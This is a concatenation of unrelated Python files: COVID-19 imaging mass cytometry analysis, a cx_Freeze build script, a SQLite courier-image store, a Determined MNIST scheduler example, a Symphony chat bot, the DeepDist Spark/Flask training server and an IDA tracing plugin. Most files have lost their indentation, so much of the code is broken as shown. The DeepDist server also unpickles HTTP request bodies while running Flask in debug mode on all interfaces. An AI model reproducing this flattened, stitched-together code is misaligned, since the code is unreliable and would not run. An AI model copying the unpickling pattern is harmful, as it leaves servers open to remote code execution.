# mixes[(m, s)] = get_best_mixture_number(y[m], 2, 8)
# thresholds[(m, s)] = get_threshold_from_gaussian_mixture(
# y[m], None, mixes[(m, s)]
# ).to_dict()
# yaml.dump(thresholds, open(thresholds_file, "w"))
# yaml.dump(mixes, open(mixes_file, "w"))
# thresholds = yaml.load(open(thresholds_file))
# mixes = yaml.load(open(mixes_file))
# # Make dataframe with population for each marker
# gating_file = consts.output_dir / "gating" / "positive.per_sample.pq"
# if not gating_file.exists():
# _pos = list()
# for s in quant["sample"].unique():
# y = quant.query(f"sample == '{s}'")
# pos = pd.DataFrame(index=y.index, columns=consts.functional_markers)
# for m in consts.functional_markers:
# o = sorted(thresholds[(m, s)])
# if mixes[(m, s)] == 2:
# pos[m] = y[m] > thresholds[(m, s)][o[0]]
# else:
# pos[m] = y[m] > thresholds[(m, s)][o[-1]]
# sel = pos[m] == False
# pos.loc[sel, m] = y.loc[sel, m] > thresholds[(m, s)][o[-2]]
# _pos.append(pd.concat([pos, y[ids]], axis=1))
# pos = pd.concat(_pos, axis=0)
# pos.to_parquet(gating_file)
# pos = pd.read_parquet(gating_file)
# # Univariate gating of each channel per sample (with Z-scored data)
# zquant = a.to_df()
# thresholds_file = consts.output_dir / "thresholds.activation.zscore.json"
# mixes_file = consts.output_dir / "mixes.activation.zscore.json"
# if not (thresholds_file.exists() and thresholds_file.exists()):
# mixes = dict()
# thresholds = dict()
# for m in consts.functional_markers:
# if m not in thresholds:
# mixes[m] = get_best_mixture_number(zquant[m], 2, 8)
# thresholds[m] = get_threshold_from_gaussian_mixture(
# zquant[m], None, mixes[m]
# ).to_dict()
# json.dump(thresholds, open(thresholds_file, "w"), indent=4)
# json.dump(mixes, open(mixes_file, "w"), indent=4)
# thresholds = json.load(open(thresholds_file))
# mixes = json.load(open(mixes_file))
# # Make dataframe with population for each marker
# gating_file = consts.output_dir / "gating" / "positive.z_score.pq"
# if not gating_file.exists():
# pos = pd.DataFrame(index=quant.index, columns=consts.functional_markers)
# for m in consts.functional_markers:
# name = m.split("(")[0]
# o = sorted(thresholds[m])
# if mixes[m] == 2:
# pos[m] = quant[m] > thresholds[m][o[0]]
# else:
# pos[m] = quant[m] > thresholds[m][o[-1]]
# sel = pos[m] == False
# pos.loc[sel, m] = quant.loc[sel, m] > thresholds[m][o[-2]]
# pos = pd.concat([pos, quant[ids]], axis=1)
# pos.to_parquet(gating_file)
# pos = pd.read_parquet(gating_file)
# pos.index.name = "obj_id"
# p = pos.merge(roi_attributes["phenotypes"].reset_index())
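    # NOTE: `pos` and `roi_attributes` below assume one of the commented-out
    # gating blocks above was run in the session (notebook-style code).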
po = pos.groupby("roi").sum()
total = pos.groupby("roi").size()
perc = (po.T / total).T * 100
fig, stats = swarmboxenplot(
data=perc.join(roi_attributes),
x="phenotypes",
y=consts.functional_markers,
)
# by cell type
m = pos.merge(a.obs, on=["sample", "roi", "obj_id"])
po = m.groupby(["metacluster_labels_2.0", "roi"])[
consts.functional_markers
].sum()
total = m.groupby(["metacluster_labels_2.0", "roi"]).size()
perc = (po.T / total).T.fillna(0) * 100
grid = clustermap(perc.groupby(level=0).mean())
p = (
perc.join(roi_attributes["phenotypes"])
.groupby(["metacluster_labels_2.0", "phenotypes"])
.mean()
)
grid = clustermap(p, row_cluster=False)
grid = clustermap(p, row_cluster=False, col_cluster=False)
grid = clustermap(p.T, config="z", row_cluster=False, col_cluster=False)
grid = clustermap(p, config="z", row_cluster=False, col_cluster=False)
# fig, stats = swarmboxenplot(
# data=perc.join(roi_attributes),
# x="phenotypes",
# y=consts.functional_markers,
# )
# Try using hard thresholds (doesn't work)
# zquant = a.to_df()
# zquant.index = zquant.index.astype(str)
# pos = (zquant[consts.functional_markers] > 3).join(a.obs[ids])
# pos.index = pos.index.astype(int)
# pos.index.name = 'obj_id'
def intra_metacluster(prj: Project) -> None:
(consts.output_dir / "refined_cell_types").mkdir()
prefix = consts.output_dir / "phenotyping" / prj.name + "."
h5ad_f = prefix + "sample_zscore.labeled.h5ad"
a = sc.read(h5ad_f)
res = 2.0
metaclusters = a.obs[f"metacluster_labels_{res}"].unique()
metaclusters = [
"T cells",
"Neutrophils",
"Macrophages|Monocytes",
"Endothelial",
"Epithelial",
"B cells",
"NK cells",
]
for metacluster in metaclusters:
output_prefix = (
consts.output_dir
/ "refined_cell_types"
/ metacluster.replace(" ", "_").replace("|", "-")
+ "."
)
ta = a[a.obs[f"metacluster_labels_{res}"].str.contains(metacluster), :]
ta = ta[:, ~ta.var.index.isin(consts.tech_channels)]
# sc.pp.scale(ta)
sc.pp.pca(ta)
with parallel_backend("threading", n_jobs=12):
sc.pp.neighbors(ta, n_neighbors=15, use_rep="X_pca")
with parallel_backend("threading", n_jobs=12):
sc.tl.umap(ta, gamma=25)
nres = 1.0
sc.tl.leiden(ta, resolution=nres, key_added=f"refined_cluster_{nres}")
ta.obs[f"refined_cluster_{nres}"] = pd.Categorical(
ta.obs[f"refined_cluster_{nres}"].astype(int) + 1
)
ta.uns["phenotypes_colors"] = consts.colors["phenotypes"]
# UMAPs
# vmin = None
# vmax = np.percentile(ta.raw.X, 99, axis=0).tolist() + [None] * 4
# fig = sc.pl.umap(
# ta,
# # color=functional_markers
# color=ta.var.index.tolist()
# + [
# f"cluster_{res}",
# f"refined_cluster_{nres}",
# "phenotypes",
# "sample",
# ],
# use_raw=True,
# vmin=vmin,
# vmax=vmax,
# show=False,
# )[0].figure
# rasterize_scanpy(fig)
# fig.savefig(output_prefix + "umap.markers.raw.svgz", **consts.figkws)
fig = sc.pl.umap(
ta,
# color=functional_markers
color=ta.var.index.tolist()
+ [
f"cluster_{res}",
f"refined_cluster_{nres}",
"phenotypes",
"sample",
],
use_raw=False,
show=False,
)[0].figure
rasterize_scanpy(fig)
fig.savefig(output_prefix + "umap.markers.svgz", **consts.figkws)
# Plot cluster phenotypes
# # get mean per cluster
        m = ta.to_df().groupby(ta.obs[f"refined_cluster_{nres}"]).mean()
umap_pos = (
pd.DataFrame(
ta.obsm["X_umap"],
index=ta.obs.index,
columns=["UMAP1", "UMAP2"],
)
.groupby(ta.obs[f"cluster_{nres}"])
.mean()
)
m = m.join(umap_pos)
# # get normalized proportions per disease group
ct = ta.obs["phenotypes"].value_counts()
ct /= ct.sum()
c = ta.obs.groupby([f"refined_cluster_{nres}", "phenotypes"]).size()
p = c.groupby(level=0).apply(lambda x: x / x.sum())
p = p.to_frame().pivot_table(
index=f"refined_cluster_{nres}", columns="phenotypes", values=0
)
p = np.log(p / ct)
grid = clustermap(
m, row_colors=p, config="z", figsize=(8, 4 * max(1, res))
)
grid.fig.savefig(
output_prefix + "clustermap.svg",
**consts.figkws,
)
def filter_out_cells(
quant: DataFrame, plot=True, output_prefix: Path = None
) -> Array:
from imc.operations import get_population
from imc.utils import minmax_scale
from mpl_toolkits.mplot3d import Axes3D
# create combined score for artifact likelihood
score = minmax_scale(
(minmax_scale(quant["solidity"]) * 2)
* (1 - minmax_scale(quant["area"]))
* (1 - minmax_scale(quant["DNA"]))
)
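    # High scores flag small, DNA-poor yet highly solid objects - likely artifacts.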
# get population with highest score
## KMeans with k == 3 also works well but we have to assume smallest cluster is to remove
# from sklearn.cluster import KMeans
# al = KMeans(3)
# al.fit(score.values.reshape((-1, 1)))
# c = al.predict(score.values.reshape((-1, 1)))
# to_filter = c == pd.Series(c).value_counts().idxmin()
## Mixture of gaussians
to_filter = get_population(score, min_mix=3)
if plot:
assert output_prefix is not None
fig = plt.figure()
ax = fig.add_subplot(111, projection="3d")
for sel, edgecolor in [(to_filter, "red"), (~to_filter, "black")]:
s = ax.scatter(
quant.loc[sel]["solidity"],
np.sqrt(quant.loc[sel]["area"]),
np.log1p(quant.loc[sel]["DNA"]),
s=2,
alpha=0.25,
c=score[sel],
edgecolors=edgecolor,
linewidths=0.25,
rasterized=True,
)
fig.colorbar(s, ax=ax, label="score")
ax.set(xlabel="solidity", ylabel="area", zlabel="DNA")
fig.savefig(output_prefix + "3d_scatter.svg", **consts.figkws)
fig, axes = plt.subplots(1, 3, figsize=(3 * 4, 1 * 4), sharey=True)
for ax, var in zip(axes, ["area", "DNA", "solidity"]):
sns.distplot(
quant[var][~to_filter], label="To keep", kde=False, ax=ax
)
sns.distplot(
quant[var][to_filter], label="To remove", kde=False, ax=ax
)
ax.set_xlabel(var)
ax.legend()
axes[0].set_ylabel("Cell number")
fig.savefig(
output_prefix + "per_variable_histogram.svg", **consts.figkws
)
return to_filter
def example_visualizations(prj) -> None:
from imc.graphics import get_grid_dims
from csbdeep.utils import normalize
output_dir = consts.output_dir / "example_visualizations"
output_dir.mkdir()
examples = [
        # ((roi_name, example_name), (pos=((y2, y1), (x2, x1)), markers))
(
(
"A20_77_20210121_ActivationPanel-06",
"S100A9_reduct_in_monos_covid",
),
(
None,
[
"CD14",
"S100A9",
"DNA",
],
),
),
(
(
"A20_77_20210121_ActivationPanel-06",
"S100A9_reduct_in_monos_covid_zoom",
),
(
((1200, 940), (1000, 740)),
[
"CD14",
"S100A9",
"DNA",
],
),
),
(
(
"A19_33_20210121_ActivationPanel-04",
"S100A9_high_in_monos_healthy3",
),
(
None,
[
"CD14",
"S100A9",
"DNA",
],
),
),
(
(
"A19_33_20210121_ActivationPanel-04",
"S100A9_high_in_monos_healthy3_zoom",
),
(
((400, 140), (700, 440)),
[
"CD14",
"S100A9",
"DNA",
],
),
),
(
("A20_77_20210121_ActivationPanel-05", "HLADR_in_keratin_covid"),
(
None,
[
"HLADR",
"Keratin818",
"DNA",
],
),
),
(
(
"A20_77_20210121_ActivationPanel-05",
"HLADR_in_keratin_covid_zoom",
),
(
((260, 20), (790, 550)),
[
"HLADR",
"Keratin818",
"DNA",
],
),
),
(
(
"A19_33_20210121_ActivationPanel-04",
"HLADR_not_in_keratin_healthy",
),
(
None,
[
"HLADR",
"Keratin818",
"DNA",
],
),
),
(
(
"A19_33_20210121_ActivationPanel-04",
"HLADR_not_in_keratin_healthy_zoom",
),
(
((460, 220), (520, 280)),
[
"HLADR",
"Keratin818",
"DNA",
],
),
),
(
("A20_58_20210122_ActivationPanel-06", "pNFkbp65_in_monos_covid"),
(None, ["CD16", "pNFkbp65", "DNA"]),
),
(
("A20_58_20210122_ActivationPanel-06", "VISTA_not_in_Tcells"),
(None, ["VISTA", "CD3(", "CD15"]),
),
(
("A20_58_20210122_ActivationPanel-06", "TIM3_not_in_Tcells"),
(None, ["TIM3", "CD3(", "CD15"]),
),
(
("A20_58_20210122_ActivationPanel-06", "PDL1_not_in_Tcells"),
(None, ["PDL1", "CD3(", "CD15"]),
),
(
("A20_58_20210122_ActivationPanel-06", "PD1_not_in_Tcells"),
(None, ["PD1", "CD3(", "CD15"]),
),
(
("A20_58_20210122_ActivationPanel-08", "VISTA_not_in_Tcells2"),
(None, ["VISTA", "CD3(", "CD15"]),
),
(
("A20_58_20210122_ActivationPanel-08", "VISTA_not_in_Tcells2_zoom"),
(((600, 340), (1200, 940)), ["VISTA", "CD3(", "CD15"]),
),
]
examples = [
(
("A19_33_20210121_ActivationPanel-02", "S100A9_low_in_Healthy"),
(None, ["S100A9", "CD15", "Keratin818"]),
),
(
("A20_47_20210120_ActivationPanel-07", "S100A9_high_in_COVIDearly"),
(None, ["S100A9", "CD15", "Keratin818"]),
),
(
("A20_77_20210121_ActivationPanel-04", "S100A9_high_in_COVIDlate"),
(None, ["S100A9", "CD15", "Keratin818"]),
),
(
("A19_33_20210121_ActivationPanel-02", "S100A9_low_in_Healthy2"),
(None, ["S100A9", "CD15", "DNA"]),
),
(
("A20_47_20210120_ActivationPanel-07", "S100A9_high_in_COVIDearly"),
(None, ["S100A9", "CD15", "DNA"]),
),
(
("A20_77_20210121_ActivationPanel-04", "S100A9_high_in_COVIDlate2"),
(None, ["S100A9", "CD15", "DNA"]),
),
]
for example in examples:
(roi_name, example_name), (pos, markers) = example
roi = prj.get_rois(roi_name)
fig1 = roi.plot_channels(
markers, equalize=False, position=pos, smooth=3
)
fig1.savefig(
output_dir / f"examples.{example_name}.separate.svg",
**consts.figkws,
)
fig2 = roi.plot_channels(
markers[:3],
equalize=False,
position=pos,
merged=True,
# smooth=1
)
fig2.savefig(
output_dir / f"examples.{example_name}.merged.svg", **consts.figkws
)
# plot manually
from imc.graphics import add_scale
from skimage.filters import gaussian
p = np.asarray(
[
gaussian(normalize(x), sigma=1)
for x in roi._get_channels(markers[:3])[1]
]
)
if pos is not None:
p = p[:, slice(pos[0][1], pos[0][0]), slice(pos[1][1], pos[1][0])]
fig3, ax = plt.subplots(figsize=(4, 4))
ax.imshow(np.moveaxis(normalize(p), 0, -1))
add_scale(ax)
ax.axis("off")
fig3.savefig(
output_dir / f"examples.{example_name}.merged.smooth.svg",
**consts.figkws,
)
@dataclass
class consts:
cur_date = f"{datetime.datetime.now().date()}"
figkws = dict(bbox_inches="tight", dpi=300)
metadata_dir = Path("metadata")
data_dir = Path("data")
results_dir = Path("results")
output_dir = results_dir / "imc_revision"
output_dir.mkdir()
# Sample-specific
phenotypes = (
pd.Series(
{
"A19_33_20210121_ActivationPanel": "Healthy",
"A19_33_20210122_ActivationPanel": "Healthy",
"S19_6699_20210120_ActivationPanel": "Healthy",
"A20_47_20210120_ActivationPanel": "COVID19_early",
"A20_58_20210122_ActivationPanel": "COVID19_early",
"A20_56_20210120_ActivationPanel": "COVID19_late",
"A20_77_20210121_ActivationPanel": "COVID19_late",
},
name="phenotypes",
)
.rename_axis(index="sample")
.astype(
pd.CategoricalDtype(
ordered=True,
categories=["Healthy", "COVID19_early", "COVID19_late"],
)
)
)
colors = {
"phenotypes": [
matplotlib.colors.to_hex(x)
for x in np.asarray(sns.color_palette("tab10"))[[2, 4, 3]]
],
"disease": [
matplotlib.colors.to_hex(x)
for x in np.asarray(sns.color_palette("tab10"))[[2, 3]]
],
}
# Load cluster assignments
cluster_idents = json.load(
open(metadata_dir / "imc_revision.cluster_identities.json")
)
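    # JSON keys are strings; cast resolutions back to float and cluster ids to int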
cluster_idents = {
float(res): {int(c): n for c, n in clusts.items()}
for res, clusts in cluster_idents.items()
}
# Subset markers
exclude_channels = [
"80ArAr(ArAr80)",
"129Xe(Xe129)",
"190BCKG(BCKG190)",
"<EMPTY>(Pb204)",
]
tech_channels = [
"perimeter",
"DNA",
"major_axis_length",
"eccentricity",
"solidity",
"DNA",
"HistoneH3(In113)",
]
functional_markers = [
"pH3s28(In115)",
"Ki67",
"CD45RO(Nd142)",
"GATA3(Dy164)",
"TBet(Sm149)",
"GranzymeB(Er167)",
"pNFkbp65(Er166)",
"CD27(Yb171)",
"CD86(Sm152)",
"CD44(Eu153)",
"CD127(Er168)",
"CD123(Tm169)",
"CD38(Pr141)",
"CD161(Gd158)",
"S100A9(Yb173)",
"HLADR(Ho165)",
"CleavedCaspase3(Yb172)",
"PD1(Nd150)",
"PDL1(Lu175)",
"VISTA(Gd160)",
"TIM3(Nd145)",
]
"""
# To quickly convert svgz to pdf (faster than saving as pdf directly)
for F in `find results/imc_revision -name "*.svgz"`
do
if [ ! -f ${F/svgz/pdf} ]; then
echo $F
sleep 1
inkscape -o ${F/svgz/pdf} $F 2> /dev/null
fi
done
"""
if __name__ == "__main__":
try:
sys.exit(main())
except KeyboardInterrupt:
sys.exit(1)
|
from cx_Freeze import setup, Executable
import os
import sys
os.environ['TCL_LIBRARY'] = "C:\\Users\\danilo\\AppData\\Local\\Programs\\Python\\Python36-32\\tcl\\tcl8.6"
os.environ['TK_LIBRARY'] = "C:\\Users\\danilo\\AppData\\Local\\Programs\\Python\\Python36-32\\tcl\\tk8.6"
include_files=["C:\\Users\\danilo\\AppData\\Local\\Programs\\Python\\Python36-32\\DLLs\\tcl86t.dll",
"C:\\Users\\danilo\\AppData\\Local\\Programs\\Python\\Python36-32\\DLLs\\tk86t.dll",
".\\modes",
".\\keyboard",
".\\maps"]
base = None
# Dependencies are automatically detected, but it might need fine tuning.
build_exe_options = {
'packages': ["tkinter","mido","os","yaml","threading","time"],
'include_files': include_files,
'excludes': ['unittest', 'test']
}
# GUI applications require a different base on Windows
if sys.platform == "win32":
    base = "Win32GUI"
setup (
name = "pianopad",
version = "0.1",
description = "El perro, el perro, is mi corazon...",
options = {"build_exe": build_exe_options},
executables = [Executable("pianopad.py", base=base)]
) |
import sqlite3
class DeliveryServiceAPI:
def __init__(self):
self.APIDB = sqlite3.connect('delivery_service.db')
        self.APIDB.execute('''create table if not exists courier_images (
                            bill_number TEXT UNIQUE NOT NULL,
                            courier_image BLOB NOT NULL,
                            primary key(bill_number)
                            )''')
def getcourierPicData(self, billNum):
picData = self.APIDB.execute('select courier_image from courier_images where bill_number = ?', (billNum,))
result = b''
for data, in picData:
result = data
return result
def recordcourierInfo(self, billNum, courierImage):
self.APIDB.execute("insert into courier_images(bill_number, courier_image) values(?,?)", (billNum, courierImage))
self.APIDB.commit()
    def deleteUserData(self, billNum):  # TODO: needs to be fixed
self.APIDB.execute('delete from courier_images where bill_number = ?', (billNum,))
self.APIDB.commit()
if __name__ =="__main__":
testAPI = DeliveryServiceAPI()
testBillNum = '1111111111111'
data=b''
with open("picture/ju.jpg","rb") as f:
data=f.read()
testAPI.recordcourierInfo(testBillNum,data)
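    # Hypothetical round-trip check (assumes the insert above succeeded):
    assert testAPI.getcourierPicData(testBillNum) == data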
|
class segmentation(object):
def __init__(self):
self.__report = None
@property
def report(self):
print('print out the report')
class lungSeg(segmentation):
def __init__(self):
super(lungSeg, self).__init__()
self.__show = None
@property
def show(self):
print('this is segmentation result')
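
if __name__ == '__main__':
    # Minimal usage sketch: lungSeg inherits the `report` property and adds `show`.
    # Accessing each property triggers its print side effect.
    seg = lungSeg()
    seg.report  # prints 'print out the report'
    seg.show    # prints 'this is segmentation result'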
|
#!/usr/bin/env pypy3
# -*- coding: UTF-8 -*-
n,m=map(int,input().split())
a=set([input() for i in range(n)])  # words known by the first player
b=set([input() for i in range(m)])  # words known by the second player
chk=a&b                             # words both players know
a-=chk
b-=chk
# Shared words are split between the players, with the first player taking the
# extra one when their count is odd; the first player wins iff their exclusive
# words plus that parity bonus exceed the opponent's exclusive words.
print('YES' if (len(a)>len(b)-len(chk)%2) else 'NO')
|
"""
This example is based on Determined's MNIST PyTorch example.
This file is a how-to example for multiple learning rate schedulers
in Determined.
"""
from typing import Any, Dict, Sequence, Tuple, Union, cast
import torch
from torch import nn
from torch.optim.lr_scheduler import _LRScheduler
from layers import Flatten # noqa: I100
import determined as det
from determined.pytorch import DataLoader, PyTorchTrial, reset_parameters, LRScheduler
import data
import torchvision
TorchData = Union[Dict[str, torch.Tensor], Sequence[torch.Tensor], torch.Tensor]
class MultiLRScheduler(_LRScheduler):
def __init__(self, lr1, lr2, optimizer, last_epoch=-1):
self.lr1 = lr1
self.lr2 = lr2
super(MultiLRScheduler, self).__init__(optimizer, last_epoch)
def load_state_dict(self, state_dict):
lr1_state = state_dict["lr1"]
lr2_state = state_dict["lr2"]
del state_dict["lr1"]
del state_dict["lr2"]
super().load_state_dict(state_dict)
self.lr1.load_state_dict(lr1_state)
self.lr2.load_state_dict(lr2_state)
def state_dict(self):
state = super().state_dict()
state["lr1"] = self.lr1.state_dict()
state["lr2"] = self.lr2.state_dict()
state['last_epoch'] = self.last_epoch
state['_step_count'] = self._step_count
return state
def step(self, epoch=None):
if epoch is None and self.last_epoch < 0:
'''
            During initialization, PyTorch schedulers call .step().
Therefore, self.lr1 and self.lr2 have already had the initial .step()
called. We need to then just set the main class variables.
'''
self._step_count = 1
self.last_epoch = 0
else:
if epoch is None:
epoch = self.last_epoch + 1
self.last_epoch = epoch
self.lr1.step()
self.lr2.step()
self._last_lr = [group['lr'] for group in self.optimizer.param_groups]
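
# A minimal sketch of driving MultiLRScheduler from a plain PyTorch loop
# (outside Determined; `model` and `loader` are illustrative names only):
#
#   optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
#   lr1 = torch.optim.lr_scheduler.StepLR(optimizer, step_size=1)
#   lr2 = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=100)
#   sched = MultiLRScheduler(lr1, lr2, optimizer)
#   for batch in loader:
#       ...  # forward/backward
#       optimizer.step()
#       sched.step()  # steps both wrapped schedulers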
class MNistTrial(PyTorchTrial):
def __init__(self, context: det.TrialContext) -> None:
self.context = context
# Create a unique download directory for each rank so they don't overwrite each other.
self.download_directory = f"/tmp/data-rank{self.context.distributed.get_rank()}"
self.data_downloaded = False
def build_training_data_loader(self) -> DataLoader:
if not self.data_downloaded:
self.download_directory = data.download_dataset(
download_directory=self.download_directory,
data_config=self.context.get_data_config(),
)
self.data_downloaded = True
dataset = data.get_dataset(self.download_directory, train=True)
return DataLoader(dataset, batch_size=self.context.get_per_slot_batch_size())
def build_validation_data_loader(self) -> DataLoader:
if not self.data_downloaded:
self.download_directory = data.download_dataset(
download_directory=self.download_directory,
data_config=self.context.get_data_config(),
)
self.data_downloaded = True
validation_data = data.get_dataset(self.download_directory, train=False)
return DataLoader(validation_data, batch_size=self.context.get_per_slot_batch_size())
def create_lr_scheduler(self, optimizer: torch.optim.Optimizer):
self.Lr2 = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, 100)
self.Lr1 = torch.optim.lr_scheduler.StepLR(optimizer, 1)
self.combined_lrs = MultiLRScheduler(self.Lr1, self.Lr2, optimizer)
# Because we are calling .step() ourselves in our MultiLRScheduler we need to
# set the StepMode to MANUAL_STEP.
return LRScheduler(self.combined_lrs, step_mode=LRScheduler.StepMode.MANUAL_STEP)
def build_model(self) -> nn.Module:
model = nn.Sequential(
nn.Conv2d(1, self.context.get_hparam("n_filters1"), 3, 1),
nn.ReLU(),
nn.Conv2d(
self.context.get_hparam("n_filters1"), self.context.get_hparam("n_filters2"), 3,
),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Dropout2d(self.context.get_hparam("dropout1")),
Flatten(),
nn.Linear(144 * self.context.get_hparam("n_filters2"), 128),
nn.ReLU(),
nn.Dropout2d(self.context.get_hparam("dropout2")),
nn.Linear(128, 10),
            nn.LogSoftmax(dim=1),
)
        # If loading backbone weights, either skip reset_parameters() or
        # call it before loading the backbone weights.
reset_parameters(model)
return model
def optimizer(self, model: nn.Module) -> torch.optim.Optimizer: # type: ignore
self.optimizer = torch.optim.Adadelta(model.parameters(), lr=self.context.get_hparam("learning_rate"))
return self.optimizer
def train_batch(
self, batch: TorchData, model: nn.Module, epoch_idx: int, batch_idx: int
) -> Dict[str, torch.Tensor]:
batch = cast(Tuple[torch.Tensor, torch.Tensor], batch)
data, labels = batch
output = model(data)
loss = torch.nn.functional.nll_loss(output, labels)
self.combined_lrs.step()
return {"loss": loss}
def evaluate_batch(self, batch: TorchData, model: nn.Module) -> Dict[str, Any]:
batch = cast(Tuple[torch.Tensor, torch.Tensor], batch)
data, labels = batch
output = model(data)
validation_loss = torch.nn.functional.nll_loss(output, labels).item()
pred = output.argmax(dim=1, keepdim=True)
accuracy = pred.eq(labels.view_as(pred)).sum().item() / len(data)
return {"validation_loss": validation_loss, "accuracy": accuracy}
|
# MTH 437 HW 1
# 0.0 X0
# Author: Paul Glenn
from math import cos
x = 2.0 #Initial guess
eps = 1.1*10**-16 #Just allows it to terminate with near-perfect agreement
g = open('HW1.txt','w+')
while abs(cos(x)-x)>eps:
x = cos(x)
g.write('guess = {:<20} | cos(x) = {:^10}'.format(repr(x),repr(cos(x)))+'\n')
    # repr() keeps every digit; also satisfies the string-output requirement
g.close()
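# Note: this is fixed-point iteration on g(x) = cos(x); since |g'(x)| = |sin(x)| < 1
# near the root, it converges (linearly) to the Dottie number, about 0.7390851332.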
|
import re
from symphony.bdk.core.activity.command import CommandContext
from symphony.bdk.core.service.datafeed.real_time_event_listener import RealTimeEventListener
from symphony.bdk.gen.agent_model.v4_initiator import V4Initiator
from symphony.bdk.gen.agent_model.v4_message_sent import V4MessageSent
from symphony.bdk.gen.agent_model.v4_symphony_elements_action import V4SymphonyElementsAction
from symphony.bdk.gen.pod_model.v3_room_attributes import V3RoomAttributes
from symphony.bdk.core.service.message.message_service import MessageService
from .activities import EchoCommandActivity, GreetUserJoinedActivity
from .gif_activities import GifSlashCommand, GifFormReplyActivity
class MessageListener(RealTimeEventListener):
def __init__(self, messages: MessageService):
self._messages = messages
super().__init__()
async def on_message_sent(self, initiator: V4Initiator, event: V4MessageSent):
message = event.message.message
message_text = re.sub('<[^<]+>', '', message)
if message_text.startswith("/order"):
form = "<form id=\"order\">"
form += "<text-field name=\"ticker\" placeholder=\"Ticker\" /><br />"
form += "<text-field name=\"quantity\" placeholder=\"Quantity\" /><br />"
form += "<text-field name=\"price\" placeholder=\"Price\" /><br />"
form += "<button type=\"action\" name=\"order\"> Place Order</button>"
form += "</form>"
await self._messages.send_message(event.message.stream.stream_id, form)
class FormListener(RealTimeEventListener):
def __init__(self, messages: MessageService):
self._messages = messages
super().__init__()
    async def on_symphony_elements_action(self, initiator: V4Initiator, event: V4SymphonyElementsAction):
if event.form_id == 'order':
values = event.form_values
            reply_template = "Order placed for {quantity} of <cash tag=\"{ticker}\" /> @ {price}"
await self._messages.send_message(event.stream.stream_id, reply_template.format(**values)) |
import copy
import cPickle as pickle
from multiprocessing import Process
from rwlock import RWLock
import socket
import sys
import time  # used by the model-serving wait loop in start()
from threading import Thread
import urllib2
import urlparse
"""Lightning-Fast Deep Learning on Spark
"""
class DeepDist:
def __init__(self, model, batch=None, master='127.0.0.1:5000'):
"""DeepDist - Distributed deep learning.
:param model: provide a model that can be trained in parallel on the workers
"""
self.model = model
self.lock = RWLock()
self.descent = lambda model, gradient: model
self.master = master
self.state = 'serving'
self.served = 0
self.received = 0
self.batch = batch
self.server = None
def __enter__(self):
Thread(target=self.start).start()
# self.server = Process(target=self.start)
# self.server.start()
return self
def __exit__(self, type, value, traceback):
# self.server.terminate()
pass # need to shut down server here
def start(self):
from flask import Flask, request
app = Flask(__name__)
@app.route('/')
def index():
return 'DeepDist'
@app.route('/model', methods=['GET', 'POST', 'PUT'])
def model_flask():
i = 0
while (self.state != 'serving') and (i < 1000):
time.sleep(1)
i += 1
self.lock.acquire_read()
self.served += 1
model = copy.deepcopy(self.model)
self.lock.release()
return pickle.dumps(model, -1)
@app.route('/update', methods=['GET', 'POST', 'PUT'])
def update_flask():
gradient = pickle.loads(request.data)
self.lock.acquire_write()
            self.state = 'receiving'  # pause serving while a gradient update is applied
self.received += 1
self.descent(self.model, gradient)
if self.received >= self.served:
self.received = 0
self.served = 0
self.state = 'serving'
self.lock.release()
return 'OK'
print 'Listening to 0.0.0.0:5000...'
app.run(host='0.0.0.0', debug=True, threaded=True, use_reloader=False)
def train(self, rdd, gradient, descent):
master = self.master # will be pickled
print 'master0: ', master
        if master is None:
master = rdd.ctx._conf.get('spark.master')
print 'master1: ', master
if master.startswith('local['):
master = 'localhost:5000'
else:
if master.startswith('spark://'):
master = '%s:5000' % urlparse.urlparse(master).netloc.split(':')[0]
else:
master = '%s:5000' % master.split(':')[0]
print '\n*** master: %s\n' % master
self.descent = descent
batch = self.batch
        def mapPartitions(data):
            # Python 2 has no `nonlocal`, so share exhaustion state with the
            # inner iterator through a mutable one-element list.
            exhausted = [False]
            class Iter:
                def __iter__(self):
                    self.i = 0
                    return self
                def next(self):
                    if (batch is None) or (self.i < batch):
                        self.i += 1
                        try:
                            return data.next()
                        except StopIteration:
                            exhausted[0] = True  # partition fully consumed
                            raise
                    else:
                        raise StopIteration  # end of this mini-batch
            res = []
            while not exhausted[0]:
                res.append(send_gradient(gradient(fetch_model(master=master), Iter()), master=master))
            return res
return rdd.mapPartitions(mapPartitions).collect()
def fetch_model(master='localhost:5000'):
print '\n*** url: %s' % ('http://%s/model' % master)
request = urllib2.Request('http://%s/model' % master,
headers={'Content-Type': 'application/deepdist'})
return pickle.loads(urllib2.urlopen(request).read())
def send_gradient(gradient, master='localhost:5000'):
if not gradient:
return 'EMPTY'
request = urllib2.Request('http://%s/update' % master, pickle.dumps(gradient, -1),
headers={'Content-Type': 'application/deepdist'})
return urllib2.urlopen(request).read()
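# Hedged usage sketch (assumes a SparkContext `sc`; compute_gradient and
# apply_gradient are illustrative user-defined callables, not part of this file):
#
#   with DeepDist(model) as dd:
#       dd.train(sc.textFile('corpus.txt'),
#                gradient=lambda m, data: compute_gradient(m, data),
#                descent=lambda m, grad: apply_gradient(m, grad))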
|
import idc
import idaapi
import idautils
PRE_ADDR = None
def clear():
heads = idautils.Heads(idc.SegStart(idc.ScreenEA()), idc.SegEnd(idc.ScreenEA()))
for i in heads:
idc.SetColor(i, idc.CIC_ITEM, 0xFFFFFF)
def get_new_color(current_color):
colors = [0xffe699, 0xffcc33, 0xe6ac00, 0xb38600]
if current_color == 0xFFFFFF:
return colors[0]
if current_color in colors:
pos = colors.index(current_color)
if pos == len(colors) - 1:
return colors[pos]
else:
return colors[pos + 1]
return 0xFFFFFF
def tracing():
global PRE_ADDR
event = idc.GetDebuggerEvent(idc.WFNE_ANY, -1)
if event <= 1:
idc.RunTo(idc.BeginEA())
idc.GetDebuggerEvent(idc.WFNE_SUSP, -1)
idc.EnableTracing(idc.TRACE_STEP, 1)
idc.GetDebuggerEvent(idc.WFNE_ANY | idc.WFNE_CONT, -1)
while True:
event = idc.GetDebuggerEvent(idc.WFNE_ANY, -1)
if event <= 1:
break
addr = idc.GetEventEa()
print event, "==>", hex(addr)
        # stop tracing when a breakpoint is hit at the same address twice in a row
if PRE_ADDR != addr:
PRE_ADDR = addr
else: # same addr
if event == idc.BREAKPOINT: # and now is breakpoint
break
current_color = idc.GetColor(addr, idc.CIC_ITEM)
new_color = get_new_color(current_color)
idc.SetColor(addr, idc.CIC_ITEM, new_color)
class InstructionTracing(idaapi.plugin_t):
flags = 0
wanted_name = "Instruction tracing"
